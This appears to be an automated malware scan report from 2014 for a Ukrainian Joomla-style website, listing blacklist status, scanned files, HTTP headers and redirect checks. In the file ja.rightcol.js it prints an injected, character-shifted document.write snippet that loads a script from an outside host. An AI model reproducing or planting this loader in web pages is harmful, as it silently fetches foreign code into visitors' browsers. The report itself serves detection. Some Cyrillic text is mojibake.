Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=decoclay-a.com.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://decoclay-a.com.ua/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://decoclay-a.com.ua/ | 200 OK Content-Length: 36407 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: china-fan.in.ua ...[23635 bytes skipped]... /h3> <div class="jamod-content"><div class="advs bannergroup_text"> <div class="bannerfooter_text"> <div>TRN.ua â <a href="http://www.trn.ua/" target="_blank">ÑÑенинги в УкÑаине</a></div> <div>Osvita.com.ua â <a href="http://osvita.com.ua/courses/" target="_blank">кÑÑÑÑ Ð² УкÑаине</a></div> <div>china-fan.in.ua â <a href="http://www.china-fan.in.ua">поездки в ÐиÑай</a></div> <div><a href='http://spravka.ua' title='SPRAVKA.UA - ÐизнеÑ-ÐаÑалог ÑоваÑов и ÑÑлÑг УкÑаинÑ' target='_blank'>SPRAVKA.UA - ÐизнеÑ-ÐаÑалог ÑоваÑов и ÑÑлÑг УкÑаинÑ</a></div> <div><a href="http://kiev.com.ua/forum/" title="Ðиев ФоÑÑм">Ðиев ФоÑÑм</a></div& ...[19032 bytes skipped]... | ||
http://decoclay-a.com.ua/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://decoclay-a.com.ua/templates/ja_purity/js/ja.script.js | 200 OK Content-Length: 3207 Content-Type: application/x-javascript | clean |
http://decoclay-a.com.ua/templates/ja_purity/js/ja.rightcol.js | 200 OK Content-Length: 1859 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JA_Collapse_Mod = new Class({ initialize: function(myElements) { options = Object.extend({ transition: Fx.Transitions.quadOut }, {}); this.myElements = myElements; var exModules = excludeModules.split(','); exModules.each(function(el,i){exModules[i]='Mod'+el}); myElements.each(function(el, i){ el.elmain = $E('.jamod-content',el); el.titleEl = $E('h3',el); if(!el.titleEl) return; if (exModules.contains(el.id)) { } if(!el.titleEl.className) el.titleEl.className=rightCollapseDefault; if(el.titleEl.className=='hide') el.hide(); }); } }); window.addEvent ('load', function(e){ var jamod = new JA_Collapse_Mod ($ES('.jamod')); }); <!-- js-tools --> w=0;while(w<54)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00xxx/gnj/l{0dmj0tubu/qiq#?=0tdsjqu?'.charCodeAt(w++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://decoclay-a.com.ua//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 311 Content-Type: text/html | clean |
http://decoclay-a.com.ua/test404page.js | 404 Not Found Content-Length: 295 Content-Type: text/html | clean |
http://counter.rambler.ru/top100.jcn?2356641 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://t.proext.com/js/to.js | 200 OK Content-Length: 1863 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: decoclay-a.com.ua
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 24 Jun 2014 18:52:06 GMT
Pragma: no-cache
Server: nginx/1.0.15
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 24 Jun 2014 18:52:06 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: b75af2d6005efb5f44ceb310347e0ff9=84355b1c92942d3f990efee923d345d3; path=/
Set-Cookie: ja_purity_tpl=ja_purity; expires=Sun, 14-Jun-2015 18:52:06 GMT; path=/
X-Powered-By: PHP/5.3.24
GET / HTTP/1.1
Host: decoclay-a.com.ua
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 24 Jun 2014 18:52:06 GMT
Pragma: no-cache
Server: nginx/1.0.15
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 24 Jun 2014 18:52:06 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: b75af2d6005efb5f44ceb310347e0ff9=84355b1c92942d3f990efee923d345d3; path=/
Set-Cookie: ja_purity_tpl=ja_purity; expires=Sun, 14-Jun-2015 18:52:06 GMT; path=/
X-Powered-By: PHP/5.3.24
Second query (visit from search engine):
GET / HTTP/1.1
Host: decoclay-a.com.ua
Referer: http://www.google.com/search?q=decoclay-a.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: decoclay-a.com.ua
Referer: http://www.google.com/search?q=decoclay-a.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.